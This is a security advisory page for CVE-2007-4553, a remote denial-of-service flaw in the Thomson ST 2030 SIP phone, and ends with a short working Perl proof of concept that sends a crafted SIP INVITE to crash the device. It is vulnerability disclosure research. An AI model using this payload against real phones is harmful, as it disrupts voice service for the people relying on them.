|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 3075 CVE : CVE-2007-4553 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : Humberto J. Abdelnur & Radu State & Olivier Festor Published : 31.08.2007
Advisory Content : MADYNES Security Advisory : Remote DOS on Thomson SIP phone ST 2030 Date of Discovery 15 February, 2007 Vendor was notified on 1 March 2007 ID: KIPH8 Synopsis After sending a message where the a space is replaced by a slash after the SIP version in the VIA, the device looks functional but in fact does not respond to any event provoking a DoS. Background SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP signalization. SIP is an ASCII based INVITE message is used to initiate and maintain a communication session. Affected devices: Thomson SIP phone ST 2030 Impact : A malicious user can remotely crash and perform a denial of service attack by sending one crafted SIP message. Resolution Fixed software will be available from the vendor and customers following recommended best practices (ie segregating VOIP traffic from data) will be protected from malicious traffic in most situations. Credits Humberto J. Abdelnur (Ph.D Student) Radu State (Ph.D) Olivier Festor (Ph.D) This vulnerability was identified by the Madynes research team at INRIA Lorraine, using the Madynes VoIP fuzzer KIPH (for a description see http://hal.inria.fr/inria-00166947/en), Configuration of our device: Software Version: v1.52.1 IP-Address obtained by DHCP as 192.168.1.106 User name : thomson To run the exploit the file thomson-2030-3.pl should be launched (assuming our configurations) as: perl thomson-2030-3.pl 192.168.1.106 5060 thomson POC Code : !/usr/bin/perl #Vulnerability for Thomson 2030 firmware v1.52.1 #It provokes a DoS in the device. use IO::Socket::INET; die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]); $socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], Proto=>'udp', PeerAddr=>$ARGV[0]); $msg = "INVITE sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP\192.168.1.2;branch=00rnFrom: Caripe <sip:caripe@192.168.1.2>;tag=00rnTo: <sip:$ARGV[2]@$ARGV[0]>;tag=00rnCall-ID: caripe@192.168.1.2rnCSeq: 2 INVITErnrn"; $socket->send($msg); -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070823/60a eb4dd/attachment.html  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |